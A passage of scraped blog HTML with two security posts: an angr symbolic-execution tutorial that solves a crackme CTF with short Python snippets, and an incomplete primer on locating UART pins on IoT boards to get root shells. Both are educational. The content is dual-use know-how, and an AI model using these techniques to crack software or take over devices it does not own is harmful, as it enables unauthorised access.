Reading and References:</h3>
<ol style="text-align: left;">
<li>"Introduction to angr Part 1" - <a href="https://blog.notso.pro/2019-03-25-angr-introduction-part1/">https://blog.notso.pro/2019-03-25-angr-introduction-part1/</a></li>
</ol>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br /></div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-41332117212818266532019-12-29T04:34:00.003-08:002019-12-29T04:43:50.594-08:00[Symbolic Execution 0x0] Solving easy CTFs with Angr and Symbolic Execution <div dir="ltr" style="text-align: left;" trbidi="on">
Hi folks, I just learned a couple nifty tricks with angr, a popular symbolic execution framework with a very slick python front end. Turns out this tool makes solving the odd crack me CTF extremely easy, I've been porting the same script around for a number of CTF challenges and it's knocking em down like nobody's business. So in the following post I'm going to give you folks a quick crash course in using the tool and show you how easy it is to solve a sample crack me.<br />
<br />
<h3 style="text-align: left;">
What is Symbolic Execution</h3>
<br />
Without going into full academic detail symbolic execution is essentially hard proof that all the algebra you learned in high school is kinda nifty. Symbolic Execution engines model a program's behavior based on the inputs they are given. These engines (<i>which may vary in their approach</i>) operate by building a database of algebraic statements about a program, sweeping up all the possible assignments and comparisons that may result in a concrete state, after which you are then allowed to query these statements to see if a certain assignment of variables makes a given state reachable. To quote a really helpful paper on this:<br />
<br />
<blockquote class="tr_bq">
<br />
<i>More specifically, a symbolic execution engine replaces input<br />with “symbolic input”—analogous to an algebraic variable—and walks through code paths, “constraining” the symbolic input at each branch such that an input to the<br />program that satisfies all constraints will cause the program to reach that particular path. The engine can then explore many possible execution paths until it identifies a<br />specific path or program state of interest, at which point<br />it can determine the input which would trigger it.</i> - "Teaching with angr: A Symbolic Execution Curriculum and CTF∗" @ <a href="https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf">https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf</a> </blockquote>
<br />
Another good explination:<br />
<br />
<i>Symbolic execution is a technique that explores feasible paths by setting an input value to</i><br />
<i>a symbol rather than a real value. The symbolic execution was first published in King’s paper in</i><br />
<i>1975 [12]. This test technique was developed to verify that a particular area of software may be</i><br />
<i>violated by the input values. The symbolic execution is largely divided into the offline symbolic</i><br />
<i>execution and the online symbolic execution. The offline symbol execution solves by choosing only</i><br />
<i>one path to create a new input value by resolving the path predicate [13]. - </i>An Automated Vulnerability Detection and Remediation Method for Software Security <a href="https://www.mdpi.com/2071-1050/10/5/1652">https://www.mdpi.com/2071-1050/10/5/1652</a><br />
<i><br /></i>
<br />
The analogy you should reach here is that its very similar to solving for "x" in an algebraic equation. We're going to look at a couple different scenarios with Angr and see how exactly you solve for x, but to start we will use a simple approach and let Angr do most of the thinking for us, taking advantage of the clear signals indicating the desired state in a program i.e we're going to make Angr try everything until the program literally reports "Good job" or "correct" or whatever gets printed to the screen to indicate that.<br />
<br />
<i>Having read the above I don't want you to assume this will take all of the reversing fun away, you will need to tell Angr where to start and stop and what to look for, and this insight will come from reading the code yourself, there maybe more contrived "win-states" or more complex phases to getting the correct input into a target function so don't completely abandon you RE skills just yet hehe.</i><br />
<br />
<br />
<h3 style="text-align: left;">
Simple Example with Angr</h3>
<br />
The following example shows a CTF challenge I got form a random site, to spare the contestants of the site I won't mention where its from in case folks are still trying to solve this one, but its a pretty easy challenge so I doubt too many will be super upset by the solution being shown here. Anyway here's what the binary looks like:<br />
<br />
<br />
<ul style="text-align: left;">
</ul>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijBlh4gV-CqJSraVnlDdd3Kb4swOdKiKITm4iyxwQ5NW6zVKdDF-0-19SiAW9Pk8a-vCO31oD2Jswfh0Xdv-IZZNkW-lcXYdZ9s_U9sit7itKRDeuCYvL42ygCJXHYZ9PTbS7M239c_mE/s1600/Screenshot+from+2019-12-29+03-23-47.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="803" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijBlh4gV-CqJSraVnlDdd3Kb4swOdKiKITm4iyxwQ5NW6zVKdDF-0-19SiAW9Pk8a-vCO31oD2Jswfh0Xdv-IZZNkW-lcXYdZ9s_U9sit7itKRDeuCYvL42ygCJXHYZ9PTbS7M239c_mE/s1600/Screenshot+from+2019-12-29+03-23-47.png" /></a></div>
<div>
<br /></div>
<div>
To give you a quick summary of whats going on:<br />
<br />
<ul style="text-align: left;">
<li><span style="font-family: "courier new" , "courier" , monospace;">@0x830</span> we can see the binary grab the <span style="font-family: "courier new" , "courier" , monospace;">argv</span> pointer from the <span style="font-family: "courier new" , "courier" , monospace;">rsi</span> and store it at <span style="font-family: "courier new" , "courier" , monospace;">rbp-0x20</span> (called <span style="font-family: "courier new" , "courier" , monospace;">var_28</span>)</li>
<li><span style="font-family: "courier new" , "courier" , monospace;">@0x858</span> <span style="font-family: "courier new" , "courier" , monospace;">argv[1]</span> is passed to a sub routine called "checkPassword()" via <span style="font-family: "courier new" , "courier" , monospace;">rdi</span> </li>
<li><span style="font-family: "courier new" , "courier" , monospace;">@0x867</span> the checkPassword return code (via al register) is checked against 0, if it is 0 the win state is assumed and "Jackpot" is printed to the screen</li>
</ul>
</div>
<div>
<br /></div>
<div>
We aren't even going to cover what checkPassword does or whether there's some cool xor crib or double pad to exploit, we don't need to know! Angr will sort out all the work for us, via the Al-Kawarithmic magic of algebra! </div>
<div>
<br /></div>
<div>
So now we know where to aim, we want to know how to get to the code block <span style="font-family: "courier new" , "courier" , monospace;">@0x869 </span>by giving it a string through <span style="font-family: "courier new" , "courier" , monospace;">argv[1]</span>, lets see if we can configure Angr to solve this.</div>
<div>
<br /></div>
<div>
<br /></div>
<h3 style="text-align: left;">
Controlling your Angr</h3>
<div>
<br /></div>
<div>
It be a little complex just jumping straight in so lets talk about the general process of breaking down some symbolic execution with Angr. Here's how the process usually goes:</div>
<div>
<ol style="text-align: left;">
<li><b>Define a win condition</b> - for the first couple times you use Angr, and for most simple CTFs this is as difficult as telling which address to look for as a reachable state or telling it to report on input that results in something being printed to the screen. </li>
<li>*(optional) <b>Define a fail condition </b>- you may not need to do this, but you can also tell Angr to avoid certain code blocks in the solutions it posts, again just a simple criteria for the constraints it will search through.</li>
<li><b>Load up a binary</b> - Not complex at all, this consits of a single API call to tell Angr which binary to analyze.</li>
<li><b>Define Variables</b> -,this tells Angr which values you are ear-marking as criteria for a win state basically warning it to keep an eye out for how these values influence execution. Also a simple set of API calls and may vary with complexity depending on if your values are in registers, coming form the command line, or are just a collection of memory addresses. </li>
<li><b>Set an initial state </b>- Very important, this is us telling Angr's simulation manager where in the binary we want to get the party started. We can point it at any place in thee binary given it makes sense to execute from there (<i>paying attention to stack conservation and arguments!</i>)</li>
<li><b>Solve! </b>- this the part where you tell Angr to make the magic happen. </li>
</ol>
<div>
So to summarize, you basically setup a start execution state, and then tell Angr to run all the goodness until it matches a given criteria.</div>
</div>
<div>
<br /></div>
<h3 style="text-align: left;">
Scripting up a solution</h3>
<div>
<br /></div>
<div>
The following script details the solution. </div>
<div>
<br /></div>
<script src="https://gist.github.com/k3170makan/6285e75b6b264aabebe1e23281141072.js"></script>
<br />
<div>
<br /></div>
<div>
I've commented the crap outta this but I will line by line this as previous posts on the subject have.</div>
<div>
<br />
The first line we see doing anything interesting is at 8:<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;"><br /></span></span>
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">project </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> angr.Project(elf_binary) </span><span class="pl-c" style="background-color: white; box-sizing: border-box; color: #6a737d; white-space: pre;"><span class="pl-c" style="box-sizing: border-box;">#</span>load up binary</span></span><br />
<span style="font-family: "courier new" , "courier" , monospace;"><span class="pl-c" style="background-color: white; box-sizing: border-box; color: #6a737d; white-space: pre;"><br /></span></span></div>
<div>
<br />
This essentially tells angr which binary we want to tagret. The next line declares a Bit Vector String using Claripy so we can ear mark the <span style="font-family: "courier new" , "courier" , monospace;">argv[1] </span>argument for constraint solving.<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">arg </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> claripy.BVS(</span><span class="pl-s" style="background-color: white; box-sizing: border-box; color: #032f62; white-space: pre;"><span class="pl-pds" style="box-sizing: border-box;">'</span>arg<span class="pl-pds" style="box-sizing: border-box;">'</span></span><span style="background-color: white; color: #24292e; white-space: pre;">,</span><span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; white-space: pre;">8</span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">*</span><span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; white-space: pre;"><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">0x</span>20</span><span style="background-color: white; color: #24292e; white-space: pre;">) </span><span class="pl-c" style="background-color: white; box-sizing: border-box; color: #6a737d; white-space: pre;"><span class="pl-c" style="box-sizing: border-box;">#</span>set a bit vector for argv[1]</span></span><br />
<br />
Why a bit vector? Well given that we want to represent all the possibilities for the input, should it not actually require a simple character (<i>guessing only at character level)</i> but some obscure value of bits, telling Claripy we want a vector of individual bit values makes sure we don't miss any details. Modeling the input this way is much more fine grained an realistic, imagine we are modeling some linux driver input here, you definitely want all the possible bit values since some will represent over/under-flowed integers.<br />
<br />
Claripy is the constraint solver for Angr, again we need not delve too deep into how it works; but for <i>claripy's</i> sake you can imagine that this builds Abstract Syntax Trees based on the disassemble'd source in order to structure the arguments stuffed into sub-routines and math procedures, the arguments can be modeled as a couple of different things in order encompass different aspect possible of the input. Better coverage of this can be found at Angr's documentation page (<a href="https://docs.angr.io/advanced-topics/claripy">https://docs.angr.io/advanced-topics/claripy</a> ).<br />
<br />
<i>I've made it way larger than it need be, and if you'd like to model yours a bit tighter you may use some information in the disassembly to declare a smaller BVS for your script.</i><br />
<br />
We now need to tell Angr to pay attention to this value, just grabbing an instance of a bit vector is not enough, we need to stuff it into a call that associates it to our project, that happens in line 11:<br />
<br />
<br />
<span style="font-family: "courier new" , "courier" , monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">initial_state </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> project.factory.entry_state(</span><span class="pl-v" style="background-color: white; box-sizing: border-box; color: #e36209; white-space: pre;">args</span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;">[elf_binary,arg]) </span></span><br />
<br />
Nothing to hard here, we then take this and use it to setup our simulation manager, the thing that steps through our program and checks for the goodness, from line 12-13:<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">simulation </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> project.factory.simgr(initial_state)</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: white; color: #24292e; white-space: pre;">simulation.explore(</span><span class="pl-v" style="background-color: white; box-sizing: border-box; color: #e36209; white-space: pre;">find</span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;">is_successful)</span></span><br />
<br />
Angr's simulation manager is pretty nifty, i recommend taking a look at the other amazing options and api calls fleshed out for it here (<a href="https://docs.angr.io/core-concepts/pathgroups">https://docs.angr.io/core-concepts/pathgroups</a>). For our purposes here we will stick to just telling it where we want to start and when to consider its exploration a success. The last part we need to make sure is defined is the win state, in line 13 we gave the explore function a parameter named "<span style="font-family: "courier new" , "courier" , monospace;">is_successfull</span>" this is a method name that Angr will call on each state it calculates matches our solution, we need to tell it when to return True or False so it knows what we want. For us this means checking the standard output for a certain string "Jackpot":<br />
<br />
<span style="font-family: Courier New, Courier, monospace;"><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">def</span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-en" style="background-color: white; box-sizing: border-box; color: #6f42c1; white-space: pre;">is_successful</span><span style="background-color: white; color: #24292e; white-space: pre;">(</span><span class="pl-smi" style="background-color: white; box-sizing: border-box; color: #24292e; white-space: pre;">state</span><span style="background-color: white; color: #24292e; white-space: pre;">):</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span style="background-color: white; color: #24292e; white-space: pre;"> output </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">=</span><span style="background-color: white; color: #24292e; white-space: pre;"> state.posix.dumps(sys.stdout.fileno())</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;"> if</span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-s" style="background-color: white; box-sizing: border-box; color: #032f62; white-space: pre;"><span class="pl-k" style="box-sizing: border-box; color: #d73a49;">b</span><span class="pl-pds" style="box-sizing: border-box;">'</span>Jackpot<span class="pl-pds" style="box-sizing: border-box;">'</span></span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;">in</span><span style="background-color: white; color: #24292e; white-space: pre;"> output:</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="pl-k" style="background-color: white; box-sizing: border-box; color: #d73a49; white-space: pre;"> return</span><span style="background-color: white; color: #24292e; white-space: pre;"> </span><span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; white-space: pre;">True</span></span><br />
<span class="pl-c1" style="background-color: white; box-sizing: border-box; color: #005cc5; font-family: Courier New, Courier, monospace; white-space: pre;"><span class="pl-k" style="box-sizing: border-box; color: #d73a49;"> return</span><span style="color: #24292e;"> </span><span class="pl-c1" style="box-sizing: border-box;">False</span></span><br />
<br />
This is a typical function call handler style API, you stuff this method name in somwhere as a parameter and in the internal magic of Angr it gets called over and over until a true is reached. What you should pay attention to here is the parameter passed to it, later on you may want to be a bit more creative than just string matching the standard output, so check out what other properites a "state" has in terms of angr's docs and it will give you other ideas you can configure the simulation manager to halt on. Obvious examples being, register values (eip, eax, etc etc) or values in a given memory region or a function of how many times a given code block is hit, the possibilities are endless (<i>in exception of whatever the halting problem prevents you from using as a criteria lol</i>).<br />
<br />
<br />
Checking this for a solution we see it quickly finds the right string:</div>
<div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTnu5cpdt7n2LmTXaNLBxLfanZV9uPghPCsi4aXGy2gGimRRXYdCDhqTx8b22ZW1G0nPgORp9c7A3zQFStP3IKwvWxjgbHpsu_GRZTFZSR9HjeOeVQNIrUR0ZD7x-b5klULtDWL-1JquA/s1600/Screenshot+from+2019-12-29+03-53-57.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="434" data-original-width="1600" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTnu5cpdt7n2LmTXaNLBxLfanZV9uPghPCsi4aXGy2gGimRRXYdCDhqTx8b22ZW1G0nPgORp9c7A3zQFStP3IKwvWxjgbHpsu_GRZTFZSR9HjeOeVQNIrUR0ZD7x-b5klULtDWL-1JquA/s1600/Screenshot+from+2019-12-29+03-53-57.png" /></a></div>
<br />
<br />
Okay so that's pretty solid proof we have the correct answer, I think if you've just started out with Angr you may want to grab this script as a starting point and add small modifications to it to see if you can pump out solutions for other CTF challenges.<br />
<br />
happy hacking!</div>
<h3 style="text-align: left;">
Reading and References</h3>
<div>
<br /></div>
<div>
<ol style="text-align: left;">
<li>Introduction to Angr (part 1) <a href="https://blog.notso.pro/2019-03-25-angr-introduction-part1/">https://blog.notso.pro/2019-03-25-angr-introduction-part1/</a></li>
<li>Angr offical documentation <a href="https://docs.angr.io/">https://docs.angr.io/</a> </li>
<li>Teaching with angr : a Symbolic Execution Curriculum and CTF* - <a href="https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf">https://www.usenix.org/system/files/conference/ase18/ase18-paper_springer.pdf</a></li>
</ol>
</div>
</div>
Keith Makanhttp://www.blogger.com/profile/10220395050030522020noreply@blogger.com0tag:blogger.com,1999:blog-5845671313867906274.post-49847277466797616032019-06-03T12:52:00.000-07:002019-07-06T14:46:01.017-07:00[Hardware] Reverse Engineering UART interfaces (Primer)<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<i>In this post I'm going to run through a crash course about UART, and write up some personal notes I use to find them quickly and dump shells on embedded devices. So is going to be a little informal at times but the aim of the post is to get the tips and process across quickly so those who want to can get to dumping shells too! So this focused on supporting the activity of interacting with UART ports as they appear on an average IoT device. </i><br />
<br />
<i><br /></i>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_yDQl8D8ppcu65iiPuUGkpaaeLsOquvlCb0zmPuhdIBj3qWkldUyuT9rRqrinuYNbDSpKAn07ky8mXNZhe4GNPySRU7JYVS6gI2UWQxro_ZRBQTWDC-_kfYhpqjGMfY2yOrAs_vYhhgk/s1600/Screenshot+from+2019-04-19+21-31-01.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="413" data-original-width="651" height="406" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_yDQl8D8ppcu65iiPuUGkpaaeLsOquvlCb0zmPuhdIBj3qWkldUyuT9rRqrinuYNbDSpKAn07ky8mXNZhe4GNPySRU7JYVS6gI2UWQxro_ZRBQTWDC-_kfYhpqjGMfY2yOrAs_vYhhgk/s640/Screenshot+from+2019-04-19+21-31-01.png" width="640" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">This is me dumping dump UART traffic from a device using the Adafruit R232-TTL FTDI cable.</span></td></tr>
</tbody></table>
<i><br /></i>
<br />
<h3 style="text-align: left;">
TL;DR</h3>
<br />
<ul style="text-align: left;">
<li>UART exists, its stands for Universal Asynchronous Receiver-Transmitter</li>
<li>It usually comes in at least 3/4 pins Ground (GND), Transmit (TX), Receive (RX), Power (Vcc)</li>
<li>The pins on a board are usually close together and in line, grouped together (<i>especially if the PCB factory uses automated testing on the ports</i>)</li>
<li>Its a serial protocol which means bits are signaled one after the other</li>
<li>Generally used for debugging; implementations often grant root access.</li>
<li>To drop a shell (sub-TL;DR): </li>
<ul>
<li>Hook up the UART signals to a USB friendly connector</li>
<li>Open a serial console</li>
</ul>
</ul>
<h3 style="text-align: left;">
What is UART? </h3>
<br />
Well lets start with the name Universal Asynchronous Receiver-Transmitter. The Asynchronous part means that the protocol doesn't explicitly define an external clock to synchronize communication to i.e. one bit transfer per clock edge or clock cycle or every 36000 clock cycles or any "computable" function f(clock_cycles) hehe.<br />
<br />
<b>A clock signal</b><i> if you're not familiar is something that offers are regular fluctuation of signal (whatever your signal is made of, rats or electrostatic force). Why does this help computation? Why do you need a clock? Clocks are there for many reasons, most of the important one's being mathematical and theoretical (I erased my rant about successor functions and primitive recursion many times but you can check out more here </i><a href="https://plato.stanford.edu/entries/computability/">https://plato.stanford.edu/entries/computability/</a> ).<i> </i><br />
<i>Anyway; they allow us to distinguish somethings place in a "set" (whatever your set is made of, bits in a byte, memory addresses in a kernel pool, button presses in a time frame etc), or prove that something happened at a given time and synchronize actions between different modules or computing things. Clocks are pretty much always there, the only real difference is whether they are inferred from other aspects of the context; either through the rate at which data is flip flopped out of the chip (the maximum amount of times signal state is allowed to change); or by a literal externally supplied signal.</i><br />
<br />
<br />
Anyway UART could be a bit of strange place to start if you're not used to the hardware stuff (<i>which I'm not entirely used to yet either!</i>) so i thought I'd come in on a bit of a softer landing and talk about communication protocols in general.<br />
<br />
Communication can happen in some of the following ways :<br />
<br />
<ul style="text-align: left;">
<li>One a single wire one bit sequentially following the other - Serial</li>
<li>Multiple wires each signalling a bit at the same time - Parallel</li>
<li>Signalling based on the difference between signals - Differential </li>
<li>more things exist probably...</li>
</ul>
<br />
UART is on the serial side of things ("I'm super serial you guys" - E. Cartman), each bit is physically signaled down one after the other. Its important to know this because it affects how you interact with the device and sample from it. This orientation of bit signalling will theme how you navigate the errors and pitfalls when interacting with it - this again because you need to line up the bits according to a clock to argue that they were received correctly. For instance if it were parallel, and you don't have all your signals hooked up you're gonna read garbage lol. Another example if you're reading serial stuff and you aren't making good contact ALL THE TIME or if your device doesn't sample fast enough; you might see a broken clock, and not be able to interpret data correctly. So knowing what the orientation of the bit stream is gonna be is pretty crucial. Anyway on with the UART!<br />
<br />
UART comes in many variants there are modifications that cater to faster data transfer, error correction and parity bit states, etc etc. In this post I'm going to show what a stock standard UART looks like for a random embedded devices I've been torturing lately. Before we get into the pins and signals lets look at a simple state machine for the protocol (<i>because after all, even if you're engineering hardware the computer scientists are still frigging amazing at math</i>). The FSMs for UART I'm going to show are for the RX (Receive signal, which will accept data for the UART host; and the TX (Transmit signal, which will send data from the UART host).<br />
<br />
State Machine for RX:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0-Z7GjvEbsn_Cj16wHjD3FqsfdQvUGd-5V5lOLzOuccE3w3Cr0-htpzphQYgOL27PlXjdKBEM5EqUdpXWLBDgDWL6OYLMddi_x4xQlQiNCigUf-m7f6yFhEiCpNZg7vU1mvnFFhAr-cI/s1600/RX_FSM.PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="454" data-original-width="584" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj0-Z7GjvEbsn_Cj16wHjD3FqsfdQvUGd-5V5lOLzOuccE3w3Cr0-htpzphQYgOL27PlXjdKBEM5EqUdpXWLBDgDWL6OYLMddi_x4xQlQiNCigUf-m7f6yFhEiCpNZg7vU1mvnFFhAr-cI/s400/RX_FSM.PNG" width="400" /></a></div>
<br />
Just to provide some clarity on my weird notation the <span style="font-family: "courier new" , "courier" , monospace;">1,0[8]</span> - means that the state will loop 8 times gobbling up the bits (either 1 or 0). For the latest example the bits are being "gobbled" by being signaled out through RX. Also the "e" means that you don't need any input to transition to this state, some real implementations of UART have states like this; usually to reset the data buffers and counters so they can catch more data when its time.<br />
<br />
The state machine for TX looks exactly the same! It just says "TX" instead of "RX" hehe. But anyway if you know how to implement state machines in verilog this helps a ton (<i>there's an example shown later on</i>). This is because when re-creating a lot of this knowledge during reverse engineering, you'd run across many different types of FSMs describing complex protocols, check out this example from Lattice ( <a href="https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466">https://www.latticesemi.com/-/media/LatticeSemi/Documents/ReferenceDesigns/SZ/UARTUniversalAsynchronousReceiverTransmitterDocumentation.ashx?document_id=3466</a> ):<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzpKRpLee-A8at320tLGWRMd89pcz6tw29dOkuRxEflwNil41VEaVo8BhN3ehA4HBeBgU0r0zAd6rPORQ20T8xfvB48YCS6QWIAfFXh-5DOqVLfjUAyAQx7Q_xWMS99JXup4YoSjZ3290/s1600/PARITY.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><br /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzpKRpLee-A8at320tLGWRMd89pcz6tw29dOkuRxEflwNil41VEaVo8BhN3ehA4HBeBgU0r0zAd6rPORQ20T8xfvB48YCS6QWIAfFXh-5DOqVLfjUAyAQx7Q_xWMS99JXup4YoSjZ3290/s1600/PARITY.PNG" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"><img border="0" data-original-height="484" data-original-width="480" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhzpKRpLee-A8at320tLGWRMd89pcz6tw29dOkuRxEflwNil41VEaVo8BhN3ehA4HBeBgU0r0zAd6rPORQ20T8xfvB48YCS6QWIAfFXh-5DOqVLfjUAyAQx7Q_xWMS99JXup4YoSjZ3290/s320/PARITY.PNG" width="317" /></a></div>
<br />
Surprisingly simple no? This is a good place to start with wire/hardware protocols I think, as far as I've looked the other one's can be looked at as different modes and orientations of some of the tricks uart uses.<br />
<br />
For instance you can add some states to the FSM; accept 8 bits for a state before going into TX and you have a whole bunch of different instructions or addresses to store stuff or do stuff, from this simple FSM you can build a JTAG, SPI etc etc by simply adding states and adding states is not a massive mental operation once you got the previous idea. These simple extension gives you a tone of computational Joo Joo!<br />
<br />
An awesome example can be found here <a href="https://www.nandland.com/vhdl/modules/module-uart-serial-port-rs232.html">https://www.nandland.com/vhdl/modules/module-uart-serial-port-rs232.html</a> - comes in vhdl and verilog!<br />
<br />
Its just a simple case statement with extra steps, not that big a deal! The tricky part is finding the friggin ports on the board.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGRhNIWAqnzt8vzkWPgMcPZKiwfQMwSq_fsBjyuN3lQV6TDC-3hIvWGYUsxXHz2Jvem9dAZxcSEB-KqEiFMH3L0zf7-1IfNQi4c-ziE0Jw45S0EDyRT1RSF7U08VuxL4r2cSc1ee7pRQU/s1600/uart_2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="528" data-original-width="503" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGRhNIWAqnzt8vzkWPgMcPZKiwfQMwSq_fsBjyuN3lQV6TDC-3hIvWGYUsxXHz2Jvem9dAZxcSEB-KqEiFMH3L0zf7-1IfNQi4c-ziE0Jw45S0EDyRT1RSF7U08VuxL4r2cSc1ee7pRQU/s400/uart_2.PNG" width="380" /></a></td></tr>
<tr><td class="tr-caption"><span style="font-size: x-small;">This UART port dropped a root shell :) No uboot foolery needed. As you can see 3 lines are coming off the board, though there are 4 ports on the PCB? This is because one of the pins on the board was for the UART Vcc, which I don't need to use for anything because the module is already powered by the boards power supply.</span><br />
<div style="font-size: 12.8px;">
<br /></div>
</td></tr>
</tbody></table>
<h3 style="text-align: left;">
UART Pins/Signals</h3>
<br />
UART pinouts can be as bare necessity as they come, ground (obviously); one signal for receiving, one for transmitting and maybe one for the "power in" Vcc.<br />
<br />
<br />
<ul style="text-align: left;">
<li><b>RX</b> - Receive State, each clock cycle a bit is gobbled up by the device (your "host" TX should be input to this port)</li>
<li><b>TX</b> - Transmit State, ecah clock cycle a bit is pushed out by the device through this port (your <br />host" RX should be connected to this port)</li>
<li><b>Vcc</b> - Power input, a power input, usually if your UART module is mounted to a board you probably don't want to feed this any input, you may overpower the device sometimes!</li>
<li><b>GND</b> - Ground, very important port, if you don't know where this one is don't connect anything to the port. </li>
</ul>
<div>
<br /></div>
Other UART standards may have many other signals if they're fancy and want to signal when data starts being transferred (<i>to blink LEDs or signal other modules to do stuff</i>) so sometimes you might see uart standards with specifications for "RX Data Ready" or "TX Transfer Done" and other transferring metadata.<br />
<br />
The most important signals of course are RX, TX and GND you can usually get by with these. So lets look at what some UART interfaces look like on real devices. Here's some examples of UART ports, so you have a few examples to work from:<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil5CLhMIPyYMG2HRLxtEE7sTE5JWbz9mVx29o5ECS3j1tF0Pg9CZfIm3kAI80pHVxUXGDSByha0oMvBoCTzSREFsrsou-j91lHnJ4KlZ4KsGS9F_9NiKBvFHNFKaV1aWn1Ou-UHWNaLVo/s1600/Screenshot+from+2019-05-09+11-41-33.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" data-original-height="365" data-original-width="343" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEil5CLhMIPyYMG2HRLxtEE7sTE5JWbz9mVx29o5ECS3j1tF0Pg9CZfIm3kAI80pHVxUXGDSByha0oMvBoCTzSREFsrsou-j91lHnJ4KlZ4KsGS9F_9NiKBvFHNFKaV1aWn1Ou-UHWNaLVo/s1600/Screenshot+from+2019-05-09+11-41-33.png" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-size: x-small;">Straight forward UART give away, we can clearly see the GND, TX, RX port labelled on the silk screen. one can see the Vcc as the port here that is not labelled, this is probably precisely because the testing equipment doesn't use this port during certain checks. </span></td></tr>
</tbody></table>
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
